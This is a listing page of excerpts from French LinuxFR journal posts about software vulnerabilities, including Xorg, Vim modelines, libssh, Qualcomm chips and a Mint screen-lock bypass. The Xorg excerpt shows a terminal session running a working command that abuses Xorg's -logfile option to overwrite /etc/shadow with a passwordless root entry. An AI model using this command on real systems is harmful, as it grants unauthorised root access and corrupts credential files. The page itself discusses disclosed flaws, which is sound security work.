Journal Petit défi Python

Posté par . Licence CC by-sa.
27
14
jan.
2020

Aujourd’hui, je propose à ceux qui s’ennuient un petit défi de cybersécurité en Python.
Voici un script Python qui semble trivial, et qui contient une faille de sécurité :

#!/usr/bin/env python3
import random

SECRET = ''.join(random.choice("0123456789") for i in range(64))

class Sandbox:

    def ask_age(self):
        self.age = input("How old are you ? ")
        self.width = input("How
(...)

Journal Linux Mint, Mate et grosse faille foireuse au niveau du verrouillage d´écran

Posté par . Licence CC by-sa.
14
30
sept.
2019

J'ai trouvé ça tellement énorme que je vais vous relater l'aventure.

Un collègue a un laptop sous Linux Mint (ubuntu based il me semble) avec le bureau Mate. Aucune idée du desktop Manager. Tout à l'heure ont s´était posé ensemble dans une salle pour bosser sur un sujet commun [1]. On termine, il rabat l´écran de son laptop, qui vérouille la session, jusque là tout va bien. Arrivé à sa place de travail il redéploie l´écran, voit la mire l'invitant (...)

Journal [FAILLE] Code execution dans Vim via un fichier malicieux forgé

29
11
juin
2019

La vulnérabilité est tombée hier:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

Il s'agit d'execution de code, possiblement distante (merci netcat) en exploitant une //faille// dans la gestion des modeline (Fonctionnalité qui permet de configurer vim pour le buffer courant, via une ligne spécialement formaté au début du fichier)

L'astuce intéressante est que, par l'utilisation de caractères d'échappement, l'attaquant peut même rendre la ligne malicieuse invisible via cat.

Des mitigations existent (désactiver les modelines), tout est détaillé sur la page.

Journal Réflexion d'un utilisateur de Firefox avec un processeur Intel en 2019

23
25
mai
2019

Bonjour nal,

Je ne peux m'empêcher de mettre en parallèle les gains ahurissants de performance de Firefox depuis un an (cf la dernière dépêche en date) avec la dégradation tout aussi ahurissante des performances Intel depuis un an.

Tandis que les développements du premier sont entièrement tendus vers les moyens d'accroître la vitesse et la réactivité du logiciel (en même temps que sa sécurité et de proposer des outils de défense de la vie privée aux utilisateurs) (...)

Journal Qualcomm corrige une faille critique dans des dizaines de puces Snapdragon

24
8
mai
2019

Pour continuer sur les discussions autour d'Android du moment sur LinuxFR.

Source : https://app.beebom.com/qualcomm-patches-critical-flaw-dozens-snapdragon-socs/

Traduction :

Des chercheurs du groupe NCC, une compagnie spécialisée dans la cybersécurité, ont découvert une vulnérabilité critique qui affecte des dizaines de puces Qualcomm utilisés dans les téléphones et tablettes Android.

D’après les rapports, pas moins de 46 puces Qualcomm, incluant les SD820, 835, 845, 855, 625, 636, 660, 670 sont probablement impactés par la vulnérabilité qui permet d’autoriser des attaquants potentiels à accéder à (...)

Journal La faille grosse comme une maison

Posté par . Licence CC by-sa.
30
26
oct.
2018

[Dev@localhost ~]$ id

uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow

----------. 1 root root 1241 Oct 10 01:15 shadow

[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow

cat: shadow: Permission denied

[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (...)

Journal demain soir on finit tard

Posté par . Licence CC by-sa.
10
16
oct.
2018

Le CVE 2018-10933 concernant la libssh est limpide : demain on reporte tout à après demain et à la place on fait les mises à jour (si si, même pour toi le petit serveur du fond de la classe qui ne fait jamais ses mises à jour à cause de /place ici une mauvaise excuse/ )

bonjour server
bonjour 
je voudrais avoir un accès
vous avez besoin d'un mot de passe, $user
mais je n'en ai aucun !
(...)